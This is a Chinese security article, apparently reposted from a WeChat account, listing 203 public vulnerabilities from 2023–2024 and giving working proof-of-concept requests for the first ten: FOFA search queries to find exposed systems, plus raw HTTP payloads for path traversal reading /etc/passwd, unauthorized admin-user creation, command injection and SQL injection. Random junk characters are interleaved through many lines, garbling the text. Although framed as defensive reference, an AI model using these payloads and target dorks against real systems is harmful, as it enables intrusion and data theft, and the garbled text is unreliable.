互联网公开漏洞整理202309-202406
: `0 x7 t3 [. p$ N0 h道一安全 2024-06-05 07:41 北京9 F& |/ O" M! q) y$ s+ m4 g+ |' J
以下文章来源于网络安全新视界 ,作者网络安全新视界( F d) m& x3 y$ B
; T% |! I# o" P: u" @7 D1 M2 O+ ?发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。
, o- H: H# p2 t$ ^9 |1 b5 P) n8 i- y$ D. k+ ~2 D e- r4 |
漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
2 R( U( T- U- E$ x: U' t* U4 y6 p7 u- @! y6 k$ D* I0 C6 x- d( e5 H' A$ v
安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。: C# [$ b: W) J+ P$ c4 u7 F
7 Z- [/ g, k: ] H/ k
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
0 R$ a2 c" B2 m& a+ H2 Z+ X
# t% o, M" P; t3 H; L合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。) [& p3 m+ a+ X
+ H- C# o( M& t5 f/ n; k
8 L1 H8 ]- Q: J# g; l
声明
1 G: B# {2 }0 ]( n4 W( H& q& r9 l% O$ t' j/ J- `. c
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。2 K' m8 n7 [8 C6 a$ w& r# I" M
; N& l# F- a0 G
有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
$ A) C) O- c4 @& _- R1 k% [0 ?0 _7 w3 }( N; N0 F
: W/ q% V" f/ k8 T" _( e. u
+ B* b9 D! \& l( v4 i$ M" C& ^目录
2 X, A% n- X, ^7 |. d5 e: A( w4 d' c) Q$ p* u
01# b' n7 T4 |; v6 n
e, r/ L" s* ~0 Y; G$ j
1. StarRocks MPP数据库未授权访问6 S) u9 ^1 _7 E
2. Casdoor系统static任意文件读取& y) g+ n! B L% `' n* N/ ?+ ?
3. EasyCVR智能边缘网关 userlist 信息泄漏
; L7 o; b1 m% ~% B4. EasyCVR视频管理平台存在任意用户添加
; Y; W L( p% P5. NUUO NVR 视频存储管理设备远程命令执行
! @2 C1 ^( p/ r( h8 v7 u; V2 d0 y; c6. 深信服 NGAF 任意文件读取
0 q! S; S2 P) S3 _" b5 K7. 鸿运主动安全监控云平台任意文件下载0 T" f7 W. j7 j) K0 r2 H8 e) h
8. 斐讯 Phicomm 路由器RCE
9 v' E5 z$ C6 J7 q% y9. 稻壳CMS keyword 未授权SQL注入: R- a* n3 J# Z7 {2 \/ v/ c
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
" t8 f, O% p$ \9 A+ i' X( X M11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入9 n7 y c' O% R( b, ?# r, b
12. Jorani < 1.0.2 远程命令执行7 G. ^+ w& d2 u7 \$ a1 |
13. 红帆iOffice ioFileDown任意文件读取
# \0 `' z3 ]* B M14. 华夏ERP(jshERP)敏感信息泄露
+ P8 G6 m7 W; S0 T1 w; A' ?3 M15. 华夏ERP getAllList信息泄露
1 O' M! G2 l2 x$ g4 U( y8 p16. 红帆HFOffice医微云SQL注入
9 m' `+ i) | H17. 大华 DSS itcBulletin SQL 注入
$ k8 y# b' f% @ ~/ S18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
: F6 s. }9 r, W) }* }# ^19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
2 o0 R: l. T: X+ X6 X ?20. 大华ICC智能物联综合管理平台任意文件读取
" p3 R% C8 r" X21. 大华ICC智能物联综合管理平台random远程代码执行, U E/ v" V7 ~7 m1 R0 x- m' n
22. 大华ICC智能物联综合管理平台 log4j远程代码执行& M. A! X' ?7 N4 j, H
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行1 ^& d+ c/ s$ ?
24. 用友NC 6.5 accept.jsp任意文件上传5 S. A* Z' M7 k# `5 w% q* p
25. 用友NC registerServlet JNDI 远程代码执行# h% ^. o% S6 [4 ?, X# ^
26. 用友NC linkVoucher SQL注入
5 `$ U" p, y4 `27. 用友 NC showcontent SQL注入6 w/ ~4 Z) d" a4 J! T+ H4 w
28. 用友NC grouptemplet 任意文件上传- ~5 n$ R; \8 U; k( T3 K: W8 O! `
29. 用友NC down/bill SQL注入
. d5 u0 X1 W0 H) t. {30. 用友NC importPml SQL注入
0 t, S6 P1 Y2 j7 w: E& \+ C' v7 X9 d) C- I31. 用友NC runStateServlet SQL注入
' |/ m, D( p. w1 i7 n32. 用友NC complainbilldetail SQL注入* E" Z7 H8 t% z- Q; ?3 v% \: U
33. 用友NC downTax/download SQL注入0 x& Q* M' e1 r
34. 用友NC warningDetailInfo接口SQL注入
! y+ V+ F; b: e0 J35. 用友NC-Cloud importhttpscer任意文件上传
2 x5 E4 F, U2 F# n- X9 y36. 用友NC-Cloud soapFormat XXE7 f: X8 C' L e: u9 n
37. 用友NC-Cloud IUpdateService XXE6 M' n1 m8 ~( d1 n: u0 m
38. 用友U8 Cloud smartweb2.RPC.d XXE
1 g8 L4 H# Y) K39. 用友U8 Cloud RegisterServlet SQL注入
, J y, b9 w) {6 { f4 X" N# g40. 用友U8-Cloud XChangeServlet XXE% a3 x4 K" U0 h' a* x# Z
41. 用友U8 Cloud MeasureQueryByToolAction SQL注入- X: p1 f; B9 t* u& q
42. 用友GRP-U8 SmartUpload01 文件上传; o/ o6 @* j) }0 D" h- u
43. 用友GRP-U8 userInfoWeb SQL注入致RCE6 L2 |' L4 T1 f/ o* t
44. 用友GRP-U8 bx_dj_check.jsp SQL注入% D9 d$ ?5 C* d o r
45. 用友GRP-U8 ufgovbank XXE3 j5 _. V: l! n% d
46. 用友GRP-U8 sqcxIndex.jsp SQL注入
/ J; Y- k3 b1 {) f( {47. 用友GRP A++Cloud 政府财务云 任意文件读取
; `2 l- z1 O, ^/ j+ p$ _48. 用友U8 CRM swfupload 任意文件上传" @. k3 G3 G+ | E
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
, c% c% O( n8 B1 l; M50. QDocs Smart School 6.4.1 filterRecords SQL注入
6 g4 g; e$ u5 u51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入
" C/ t4 g' [+ a( C5 w52. 泛微E-Office json_common.php sql注入. N) R9 N9 {1 v0 d n: ^8 n
53. 迪普 DPTech VPN Service 任意文件上传4 K& `3 y+ O/ N# h2 H
54. 畅捷通T+ getstorewarehousebystore 远程代码执行- _. Y) y* i1 n. c+ ?
55. 畅捷通T+ getdecallusers信息泄露
- f$ I, o+ Y6 T- W56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
+ _3 ]& E" U( T4 A; n, J! U. W57. 畅捷通T+ keyEdit.aspx SQL注入- J3 H/ ]9 L8 k+ I' N% U2 i# o2 v
58. 畅捷通T+ KeyInfoList.aspx sql注入
/ u# ^* u ]% G3 q59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行
' k5 w% o0 c8 X N7 I7 J$ P60. 百卓Smart管理平台 importexport.php SQL注入
2 d1 b4 X( Q% @ y0 m( e61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
; R+ ~3 T9 h$ T: W V$ v6 y, O# P62. IP-guard WebServer 远程命令执行
: I) E; b# h, z3 Q- G63. IP-guard WebServer任意文件读取
" y8 @- }/ E% w2 n' Q64. 捷诚管理信息系统CWSFinanceCommon SQL注入5 T$ U5 G; x y* f% S0 j: c
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过1 J; p7 s% Z0 j4 J
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入9 t3 K, ?2 X% d% h9 w% t( b9 |3 C
67. 万户ezOFFICE wpsservlet任意文件上传
a5 T6 m, M. f* {" H68. 万户ezOFFICE wf_printnum.jsp SQL注入
. q4 d3 d8 ^0 Z8 C3 m H69. 万户 ezOFFICE contract_gd.jsp SQL注入' R2 `, D* s8 |5 n+ ~1 Y5 b6 i G
70. 万户ezEIP success 命令执行
( o9 \, H1 c$ s' ^( O& i71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入 |( e/ c# t1 l2 O7 m& W
72. 致远OA getAjaxDataServlet XXE. V6 a- L1 C3 j+ D
73. GeoServer wms远程代码执行
4 f: V3 n# @4 U: q74. 致远M3-server 6_1sp1 反序列化RCE
) U, ~/ n. R* X" ]1 a75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE7 q) s, I$ b5 V' f3 r
76. 新开普掌上校园服务管理平台service.action远程命令执行+ C0 R% g7 W9 p/ ]
77. F22服装管理软件系统UploadHandler.ashx任意文件上传4 o. N& J! ^* C, l: e& A: P0 f! K
78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
& Y: ^ e+ H' A/ x( M% F n79. BYTEVALUE 百为流控路由器远程命令执行8 g9 J! [; G6 p+ [5 a
80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传/ y. o! m; E2 b* p7 e& ?6 }, F
81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露; J+ g! t+ |+ J
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
' s7 v2 _) x" h x5 p+ F5 F83. JeecgBoot testConnection 远程命令执行
' ~/ S" D) l2 r( k. ~7 F. s84. Jeecg-Boot JimuReport queryFieldBySql 模板注入
5 ?: T: r! C) ^$ m& z. S+ k85. SysAid On-premise< 23.3.36远程代码执行( }0 A8 N9 R: S H( j' ~
86. 日本tosei自助洗衣机RCE
9 \9 n* f, }: H8 ]87. 安恒明御安全网关aaa_local_web_preview文件上传; q: @; H1 k1 r0 r( H: Q& ~1 U+ t" z
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
; V s! K& `5 j5 I0 b ]( l0 j+ t! y89. 致远互联FE协作办公平台editflow_manager存在sql注入
' t' u# N" A! P7 b* h90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行: n7 J" [, s$ b6 n
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取9 v. g% k- C) o7 k3 v
92. 海康威视运行管理中心session命令执行0 v! [; u' O1 K4 j4 ~' c G- E
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
! Y( n% Y# U; k# ]# b! `94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
3 r, k( H# |+ X0 j95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行+ n% H, E& [5 D# T
96. Apache OFBiz 18.12.11 groovy 远程代码执行8 ^# ~! T' w7 I6 y2 ?; {
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行6 v( P9 `$ ]& f) T5 `9 _
98. SpiderFlow爬虫平台远程命令执行# r' N5 [; [5 X
99. Ncast盈可视高清智能录播系统busiFacade RCE% r- S+ C- l; C4 ~! U, v+ T9 X4 w
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传7 |3 P/ X' {: w# B$ _0 h
101. ivanti policy secure-22.6命令注入 Q1 A- b4 Q4 g$ K6 f+ m- M5 K
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
+ p' m$ g9 ?4 J- C- q) h5 z103. Ivanti Pulse Connect Secure VPN XXE* L( H9 r6 q) s7 h" ]; ?4 r
104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露2 v6 L7 z: M {# G. B
105. SpringBlade v3.2.0 export-user SQL 注入( t4 o, q `: V% p( L4 t
106. SpringBlade dict-biz/list SQL 注入) y# h5 o* @& `- l* U6 j" X* S
107. SpringBlade tenant/list SQL 注入+ G# F! l$ [3 d1 r& P$ L- c. q1 e
108. D-Tale 3.9.0 SSRF
+ l8 F! j6 m, Y/ {+ e% e109. Jenkins CLI 任意文件读取( U% [: k3 C: n0 M. F% p4 ?+ }9 ]5 h
110. Goanywhere MFT 未授权创建管理员8 M2 R# m, ?1 f0 m
111. WordPress Plugin HTML5 Video Player SQL注入$ n2 N3 d: e [ }" }4 G
112. WordPress Plugin NotificationX SQL 注入
+ B8 j! Z2 k8 C& O113. WordPress Automatic 插件任意文件下载和SSRF* G( [1 C# J) B
114. WordPress MasterStudy LMS插件 SQL注入; w; e" e& `' a9 s+ o6 w
115. WordPress Bricks Builder <= 1.9.6 RCE% h( l( T( [0 h4 c! @
116. wordpress js-support-ticket文件上传0 {" F- |* M7 [$ ^/ K+ Y
117. WordPress LayerSlider插件SQL注入
* `+ j8 ]2 P+ C2 |# _118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
/ v; G4 |3 D7 ~: Z* }119. 北京百绰智能S20后台sysmanageajax.php sql注入# b* y/ E8 Z( C+ b0 `) f) @, j
120. 北京百绰智能S40管理平台导入web.php任意文件上传) A! s& \& b" @; r. B
121. 北京百绰智能S42管理平台userattestation.php任意文件上传# R" X6 `) E# W" Q
122. 北京百绰智能s200管理平台/importexport.php sql注入2 f6 U V) }% C1 ?0 l
123. Atlassian Confluence 模板注入代码执行
0 B. O) N$ T: ?# [9 T124. 湖南建研工程质量检测系统任意文件上传
2 O- P* `$ R" [125. ConnectWise ScreenConnect身份验证绕过
- Y* z/ U a0 }! X& w126. Aiohttp 路径遍历
; H3 x& p4 }1 r+ v+ e127. 广联达Linkworks DataExchange.ashx XXE
5 W+ @# O2 z* |) r( T128. Adobe ColdFusion 反序列化$ I8 E o0 P! _; Z
129. Adobe ColdFusion 任意文件读取
( d2 A: v& E! D2 s2 r! ]130. Laykefu客服系统任意文件上传0 p" j2 Z1 M2 J- S; |& n3 r
131. Mini-Tmall <=20231017 SQL注入 E2 A+ ]9 G; z# z8 s
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
( s8 K' ]1 L+ r3 A$ ^1 O$ K0 \133. H5 云商城 file.php 文件上传
1 O, O2 W& W9 U9 A$ c& t5 a) P134. 网康NS-ASG应用安全网关index.php sql注入
]" Y3 J( g( O. k; }- @) ^135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
4 g. B0 R: m2 Q! P& r( l136. NextChat cors SSRF7 p# W0 `/ d) `
137. 福建科立迅通信指挥调度平台down_file.php sql注入! s0 w" z5 u4 {% D& t* {# |7 x
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
8 ]: Z8 |9 }6 {6 j% l139. 福建科立讯通信指挥调度平台editemedia.php sql注入+ I" n; ?/ C( n6 Y7 } G, i! a
140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入( o* T; b: [4 r3 u4 L$ \" L
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入, g* j, w# |! A _& I5 Z+ q
142. CMSV6车辆监控平台系统中存在弱密码
/ e- U( { Y1 R6 s0 i% L; \/ P143. Netis WF2780 v2.1.40144 远程命令执行
8 U0 q8 u. p H5 `+ h6 d144. D-Link nas_sharing.cgi 命令注入+ q3 {# @( N" b7 y( t
145. Palo Alto Networks PAN-OS GlobalProtect 命令注入( X0 e+ }, C! @! o" q9 `
146. MajorDoMo thumb.php 未授权远程代码执行: {+ q3 J7 n# c; l+ R
147. RaidenMAILD邮件服务器v.4.9.4-路径遍历. N' K- [1 o- n6 x! B: M
148. CrushFTP 认证绕过模板注入
0 F+ w/ K) m r. k$ {- R! C: ]' v8 N149. AJ-Report开源数据大屏存在远程命令执行/ ~! S$ h/ k! V1 W
150. AJ-Report 1.4.0 认证绕过与远程代码执行
- K; l3 Y& u9 h) g151. AJ-Report 1.4.1 pageList sql注入0 w3 m4 d6 T4 ]8 b
152. Progress Kemp LoadMaster 远程命令执行! K0 i& E0 I8 X) I4 k+ l" e
153. gradio任意文件读取
! F1 x6 y7 X2 `+ X! L& Z154. 天维尔消防救援作战调度平台 SQL注入1 V" H, U4 p4 E- Y
155. 六零导航页 file.php 任意文件上传
$ W2 s c" g9 Y: o8 r8 x; q- i; d156. TBK DVR-4104/DVR-4216 操作系统命令注入
4 n! a6 A# W7 E. N r' x/ W157. 美特CRM upload.jsp 任意文件上传7 t$ Y7 u) I- r+ `3 \: B
158. Mura-CMS-processAsyncObject存在SQL注入
0 `8 O# z' z2 z, y" D: E0 b159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传
! ~$ f3 y) f: o160. Sonatype Nexus Repository 3目录遍历与文件读取
# [- @1 p. G ?% A2 P1 y5 }3 R' A161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传9 X" M' s1 X% A& W' Y0 G
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传
* |7 r& q# [' e; }163. 号卡极团分销管理系统 ue_serve.php 任意文件上传4 U9 S, R# M8 i- N; p {9 v- ?6 y
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
6 |: D2 m0 }1 f& q! L% v165. OrangeHRM 3.3.3 SQL 注入 S% D$ Y; l* {* f
166. 中成科信票务管理平台SeatMapHandler SQL注入/ _2 O* L9 U$ Z: ]4 {; m
167. 精益价值管理系统 DownLoad.aspx任意文件读取: y) N7 R$ F5 o
168. 宏景EHR OutputCode 任意文件读取4 X; ?1 X* D2 a
169. 宏景EHR downlawbase SQL注入, q/ U$ K8 P; d8 w/ C" B( p/ ^- k+ v& @
170. 宏景EHR DisplayExcelCustomReport 任意文件读取% H( ?& r9 Y# v$ K: z1 l6 W
171. 通天星CMSV6车载定位监控平台 SQL注入6 L7 I$ n; N! q% q
172. DT-高清车牌识别摄像机任意文件读取 T9 _7 N/ |( i" |1 ~) K6 \* K
173. Check Point 安全网关任意文件读取
4 S6 K% P% x2 ~2 p& Q, p) P1 u174. 金和OA C6 FileDownLoad.aspx 任意文件读取
9 |7 n: s3 z8 ?; K: p175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入9 o1 Y1 `3 ]6 C
176. 电信网关配置管理系统 rewrite.php 文件上传* E2 `) ^" c( J- r
177. H3C路由器敏感信息泄露" ]0 N$ F& w1 [9 }- f
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
& m: N' E! k0 I3 z' Q' L179. 建文工程管理系统存在任意文件读取- _5 a, n% W: S+ R6 Y
180. 帮管客 CRM jiliyu SQL注入
: A9 f% m( f/ l9 ^3 {181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
b) h9 @' n5 _. N9 U182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建3 [: Z7 J6 f% o9 X5 r" l$ c
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入/ u2 G3 r+ H# E5 M% A4 m2 |
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加
% A# W8 T1 {& Q+ L185. 瑞友天翼应用虚拟化系统SQL注入9 O# A; y9 s4 A( J* g, j
186. F-logic DataCube3 SQL注入
" E3 v6 A+ w$ U/ u) l; }% [187. Mura CMS processAsyncObject SQL注入* h/ u. |# g D1 p
188. 叁体-佳会视频会议 attachment 任意文件读取' R- f9 [- ?: I6 c, ^; T
189. 蓝网科技临床浏览系统 deleteStudy SQL注入: A( d4 X' C9 d c
190. 短视频矩阵营销系统 poihuoqu 任意文件读取% z! {3 _5 ^3 H
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
1 I; F n8 [2 E* r1 } H7 N( E192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
1 P) v& ^+ I& G5 c- e' w% o8 z! G193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行& O+ N# l( F# V! x- r, [
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传3 i8 U# p9 n3 \; _5 e+ h2 T5 q0 ~9 W
195. 飞鱼星上网行为管理系统 send_order.cgi命令执行2 R1 f! t: f) u
196. 河南省风速科技统一认证平台密码重置
1 H! D7 [6 B6 ?197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入
9 x; a) i/ g4 A w198. 阿里云盘 WebDAV 命令注入1 X4 B: D& y8 R# c
199. cockpit系统assetsmanager_upload接口 文件上传$ C$ F. B/ A. p! M2 W
200. SeaCMS海洋影视管理系统dmku SQL注入
5 s3 w9 l& v5 Z: `/ v6 `201. 方正全媒体新闻采编系统 binary SQL注入
4 f7 z! k1 `3 E0 a4 M& l2 ~1 |202. 微擎系统 AccountEdit任意文件上传0 R& D# ^2 b0 E2 y
203. 红海云EHR PtFjk 文件上传
s: a. Y0 o* Y) i: j3 L \* D2 E, l( O( F9 g7 c
POC列表* G7 I: T* a2 X
8 _0 ?: ?. o9 R5 p4 M Y02
! O5 y! u% [! ~# l6 h( Z: m, \( g1 I1 Y7 Y6 A8 D. [0 }
1. StarRocks MPP数据库未授权访问
9 V, d$ u1 q, r4 g, e2 Q$ xFOFA :title="StarRocks" S3 p' E: C$ ]- k
GET /mem_tracker HTTP/1.1
! U) ?1 ?1 y: W( nHost: URL7 P0 C/ x! H% [/ z, @8 V
! t. e, n& ~' W! f0 Q. _
( \1 z7 k9 l: f/ G
2. Casdoor系统static任意文件读取
. V7 @- \# V* _6 A1 B% ZFOFA :title="Casdoor"0 |' V$ v2 A+ d' c/ ?$ k/ C
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
% ~% x8 e; r$ Q9 G- w8 ZHost: xx.xx.xx.xx:9999) u5 X7 U& W' U$ d7 C
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
1 |, d) N5 `' x1 vConnection: close
7 z( o/ D- y! _. _2 YAccept: */*
7 |' k( @# j+ `! F' z* NAccept-Language: en+ _' h) Z" R6 o
Accept-Encoding: gzip8 t( Y) t1 R8 e- {1 _0 H( t
4 O" o F7 h- R$ F# Z
1 A2 H5 d5 c7 B3. EasyCVR智能边缘网关 userlist 信息泄漏
% F% E' C8 v2 b# U& x" ^* j! A0 }FOFA :title="EasyCVR"' C) a" e' k: d6 Z5 X7 Q8 c0 x4 l
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
9 G2 Z' U% ?* x: A* I! nHost: xx.xx.xx.xx4 S" u! i1 }- l8 v
2 L4 j0 x }! V$ k5 O8 [( q/ f5 R1 \- a+ l6 C$ b
4. EasyCVR视频管理平台存在任意用户添加: V4 e8 L% |) |" I; l. a
FOFA :title="EasyCVR"
$ n8 d2 ], k/ u" o7 g3 C2 _) D7 f6 k8 A* v5 d+ k& z
password更改为自己的密码md5. q1 m: u# |- I6 V
POST /api/v1/adduser HTTP/1.1
) K) T7 K* h' E6 a" d5 j! ZHost: your-ip* A) L5 f. D/ |; ]- ?* M3 I
Content-Type: application/x-www-form-urlencoded; charset=UTF-82 K$ ~$ M7 Z3 ?# m1 v- ]
/ J! C7 p1 l( S+ Y; h2 Cname=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1
( p; [7 ^$ f) r3 }# r5 k, T ^: n+ Y: \- v# Y( @
2 t, n4 @5 x- R% C- }5. NUUO NVR 视频存储管理设备远程命令执行
$ X8 l. S% t, }9 ^3 H) BFOFA:title="Network Video Recorder Login" w+ z- u& ~" I1 m {% m
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1* U+ t$ ^7 f- V& z& D# t+ I
Host: xx.xx.xx.xx n9 U1 y- G6 ]1 `
) s- |6 x. O( p, G! N' i0 W; f
" a1 p: \6 @3 X4 b+ D, W" s9 d) \
6. 深信服 NGAF 任意文件读取
. k4 S# N5 S9 m- ^" ZFOFA:title="SANGFOR | NGAF"4 A6 U+ `% d6 r- h
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
8 n1 r- \& N$ z; qHost: h" f! K; I' h" ?$ @% P, G% e
9 Q, o% U4 S+ `2 q5 g! Q
A$ I$ S- P ?& ` v7 t: m1 Z
7. 鸿运主动安全监控云平台任意文件下载1 u a" c0 c. F% C3 G9 o C
FOFA:body="./open/webApi.html"
6 }% ~! j' o1 w3 i2 a9 qGET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.12 ~/ j S, T5 X4 b: i2 ~$ h
Host:
" }2 l+ W4 Q' Q3 E0 B1 t, M* A5 k3 R
7 {3 a6 {' n# w- h: V; k
( Q0 Z/ Y3 W/ F; N# n) O) F8. 斐讯 Phicomm 路由器RCE6 T* B. O( G( n! f" A. q; R1 V
FOFA:icon_hash="-1344736688"
' Q! s+ Q% c' x" y默认账号admin登录后台后,执行操作 @! q2 N+ s7 ]$ d r1 e
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
% _; y: ?9 H2 H: I! y0 VHost: x.x.x.x
5 U ]2 v+ Z g6 v Q5 `0 v1 c. p: nCookie: sysauth=第一步登录获取的cookie6 u1 E- Y" w( C# b4 j% S& M; d
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
; O/ h$ D) W8 mUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
1 U( O, i% Q; K& L# b) v
1 r4 G) o) h, r- \0 l------WebKitFormBoundaryxbgjoytz
+ m7 D) L5 [# m4 i" ^$ WContent-Disposition: form-data; name="wifiRebootEnablestatus"
; m B$ N. W5 W# ~
6 o2 Z. F; N9 f* {: V, x2 j# D! `%s) B8 }' n5 X, V& V: k' v- Z
------WebKitFormBoundaryxbgjoytz q' }8 d9 t' x0 s9 k0 {! ]6 c( C0 K
Content-Disposition: form-data; name="wifiRebootrange"& t4 g' P" {$ X, Q
* w3 s, ~$ G4 ]* d# ^12:00; id;
, t' b" A# E; | Q: ]9 R" Z------WebKitFormBoundaryxbgjoytz% I( f0 s" C3 A3 o, z0 r
Content-Disposition: form-data; name="wifiRebootendrange") K$ d. V' H* I- a- v
! B5 c* k* P& S7 R: P
%s:
4 A( W N' |: A; T8 H& R------WebKitFormBoundaryxbgjoytz
; u H! p& o8 M) j5 ^Content-Disposition: form-data; name="cururl2"
2 h# |) T; B+ Y: ]. P. |
( l5 m1 v" s: K& D2 ?9 U: D
4 V+ ?8 \4 l+ F1 p: b, W& n+ L------WebKitFormBoundaryxbgjoytz--7 Z% S, ^7 N0 n
" L) F8 ?" l* _$ }$ h/ X
. i, A& C) v* w( F" p
9. 稻壳CMS keyword 未授权SQL注入% e$ T* f: F* q
FOFA:app="Doccms"
/ J+ U5 W+ _0 QGET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1- W+ d8 B: z, v T1 [/ b
Host: x.x.x.x
# a* E( @; S0 i& O7 X" `7 K
% S3 E, b7 {% K/ w& i: w
" p& M @( C- Y9 C% `" Q- Ppayload为下列语句的二次Url编码
' O% l, f4 Q+ n& f1 y
- r9 l7 f5 J5 v# E' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#: ^ W5 t% b h1 N
3 o# B- K& F$ o9 T% a( |# d' c4 h10. 蓝凌EIS智慧协同平台api.aspx任意文件上传
$ k# D: {+ P, g' DFOFA:icon_hash="953405444"" C% X$ A7 q, k0 @0 L
+ @3 G0 M- N- s9 Q/ q" y- n9 e9 ?
文件上传后响应中包含上传文件的路径% d: t. Q, S n- G: `7 ~% W; j
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
' ~; `# P: B l* yHost: x.x.x.x:xx
8 ~2 U) O. z; |5 D. H9 q* u' WUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
6 W" z' _4 ~2 Z5 ~$ t: I+ X7 G7 J \Content-Length: 1974 P0 @$ t8 O6 h
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9# l1 Y8 T; ^ @: z [
Accept-Encoding: gzip, deflate
+ @1 b1 T9 b( v% h" cAccept-Language: zh-CN,zh;q=0.9' r5 V5 _ X2 o- ^- ]
Connection: close8 u. h" w1 W- d* y, ^1 d+ Y1 s: O
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu% S& ] O, e, _, j6 H
. ~( w5 l* O. A' W* x6 b9 M
------WebKitFormBoundaryxdgaqmqu
n3 M0 g2 t- V- B; S: uContent-Disposition: form-data; name="file"filename="icfitnya.txt"
- z: {! Z, Y yContent-Type: text/html
) s- S" Q8 p4 C- h9 q7 `" P( `# B& C0 R5 n Z
jmnqjfdsupxgfidopeixbgsxbf
! z8 A0 j2 r6 ?' H7 G& Q% c------WebKitFormBoundaryxdgaqmqu--0 R& c+ i' ^' r( b$ f- b. b
* |! S7 ]; A1 d9 n# t; M: m1 R
" J: a$ K3 {+ I11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入. l6 e, _: r4 v; i# F5 T
FOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"
